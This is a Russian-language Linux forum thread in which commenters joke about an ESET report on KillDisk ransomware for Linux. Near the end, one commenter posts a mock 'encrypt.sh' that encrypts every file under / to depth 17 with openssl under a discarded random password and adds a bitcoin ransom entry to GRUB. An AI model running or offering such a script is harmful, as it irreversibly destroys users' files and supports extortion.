Ребята из ESET видели живой шифровальщик под линь!

222 btc, ага. нужна ссылка на гитхаб

с глубиной до 17 подкаталогов

Вот блин, век живи - век учись. Даже не знал, что есть такая опция.

О том, как KillDisk заражает Linux-компьютеры, в сообщении ESET не уточняется

скучающие задроты сами запускают после трех дней секса с зависимостями и версией компилятора

и прям в комментах доказательство:

По делу: опять полу-отчёт. Где скачать, как собрать, почему нет ссылки на гитхаб

О том, как KillDisk заражает Linux-компьютеры, в сообщении ESET не уточняется.

Предположу, что распространяется в виде юнитов system-d.

Самую мякотку - как оно проникает в систему они еще не видели

Дык, этот функционал они ещё не дописали просто.

Даже вирус без уязвимости под этот ваш линукс написать не могут. Решето и 1%!

толи опять все надо компилять и запускать

бинарник на go? ну да тяжеловат, но сейчас такие каналы.

требование о выкупе выводится прямо в меню загрузчика GRUB

А если GRUB нет? Ведь и такое может быть. Куда отправлять багрепорт?

А в чем проблема? Вполне давно бегают в диком мире.

Обожаю твои высеры про сисьдэ! Очень поднимает настроение и укрепляет мнение о ненужности этой поделки потного. Жги естчо! Я твой фанат.

Eset скоро пролетит в гос учреждениях ибо не сертефецировано. Надо о себе напоминать хотябы 1%

делая это рекурсивно с глубиной до 17 подкаталогов.

18 подкаталог — наше спасение! :)

а попасть в компьютер могут запросто.

у меня стала опера падать на всяком видео и тяжелом флэше /хтмл5.
Сперва думал памяти капец, ан нет.
И на штеуде, и на АМД, и под Винь и под Линь симптомы - «недостаточно памяти для отображения страницы», если вкладку закрыть, то она еще проживет пару минут, но потом перезапускается.

живой шифровальщик под линь!

GnuPG?

живой шифровальщик под линь!

слоупок
https://news.drweb.ru/show/?i=9699

Закончте мысль пожлст. А то то что мы подумаем это то что мы подумаем...

Самую мякотку - как оно проникает в систему они еще не видели

Тебе ссылку на список CVE дать, или сам найдешь?

т.е. под win они хакают мозги пользователю, а под линукс оскорбляют пользователя тем что игнорируют его?

делая это рекурсивно с глубиной до 17 подкаталогов

Почему 17-то.

Очевидно что в цифрах 17 и 222 зашифровано послание для знающих.

толи опять все надо компилять и запускат

Ага, еще дебажить и баги править.

Исследователи ESET утверждают, что формально «восстановление зашифрованных файлов невозможно даже в случае уплаты выкупа»,

Они платили? Пейсатели зловредов иногда удивляют тех.выкрутасами.

что в шифровании, которое используется в Linux

Нет, они говорят что «и без ключей в этом нашем ляликсе-студ.поделке можно всё расшифровать».

А если GRUB нет?

Ага, добавьте пожалуйста поддержку уефи для мажоров и лило для некрофилов.

Одно из объяснений того, что они не описали механизм проникновения в систему: ESET сами написали этот быдлокод.

Они даже хром испаганили, ну что за люди...

А у тебя есть глубже?

ужас. вирус от юзера шифрует /root
Пойду, предупрежу пацанов.
П.С. сэр, вы зачем сюда всякую желтуху тащите?

Самый простой: это заставить пользователя запустить бинарник. Привилегии можно и повысить.

А чего заканчивать.
J Обыкновенный контент от лайвлика до ютуба, реально там рейтинг +16, не более. И с ней что-то случается такое, она отжирает какую-то память, притормаживает и Ooops!

в ведре мало локальных уязвимостей?
а как насчет дистров от васянов и всяких крякальщиков эфира соседского вай-вай?

Я видел года два назад.

а когда ссылку на репу дадут, будут ворчать, что лицензия не та

А у тебя есть глубже?

root@desktop:/# find -mindepth 17 -type d | wc -l
962

Привет, я первый казахский вирус...

Справедливости ради, посмотрел сейчас, максимальная вложенность 22.

Ага. Всё в духе OSS, видимо. Вирус надо форкнуть на гитхабе, дописать установщик, и самому сделать пакеты для популярных дистрибутивов.

А как он умудряется прописаться в груб без рута? Проще же тупо хомяк зашифровать и рядом текстовый файл положить.

и как вирус получит прямой доступ к ядру?

ну как-то же опера протекает... так что всякое может случиться.

память утекшая из оперы будет захваченна ядром, которое обнаружит и запустит в ей вирус?

не, ну блин, вы тут определяйтесь, кто тут я на лоре крякер :)

То у них переполнение буфера в ведрах, с эскалацией привилегий, то нифига от текущей памяти не бывает... Я то с дивана про память утекающую в ведро ляпаю, а там хз с какого перепугу опера крашится с мессагой о нехватки памяти.

делая это рекурсивно с глубиной до 17 подкаталогов

А сразу основной каталог не варик жифрауть?

вирус от юзера зашифрует /home/username. То есть единственное то, что представляет ценность.

ну способы проникновения есть, некоторые же копипастят бездумно конфиги для коньков, ставят экстеншоны какие-то в гнум и плазмоиды в кде

и даже запускают непонятный код на перле с форумов из-под рута :)

сисьдэ

сиськемдэ

О, смотрите, исходники нашел.

## encrypt.sh
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.

pass=$(pwgen | head)
cd /
find -type f -maxdepth 17 -exec openssl enc -aes-256-cbc -salt -in '{}' -out '{}' -k "$pass" \;
echo -e "menuentry \"send your money to btc 1PC9aZC4hNX2rmmrt7uHTfYAS3hRbph4UN to get decrypt.sh\" {}" >> /etc/grub.d/40_custom
update-grub

А нефиг левые репы подключать. Кстати, никто не в курсе, чо это RetroArch перестал под линух стабильные релизы делать?

И　Coreboot.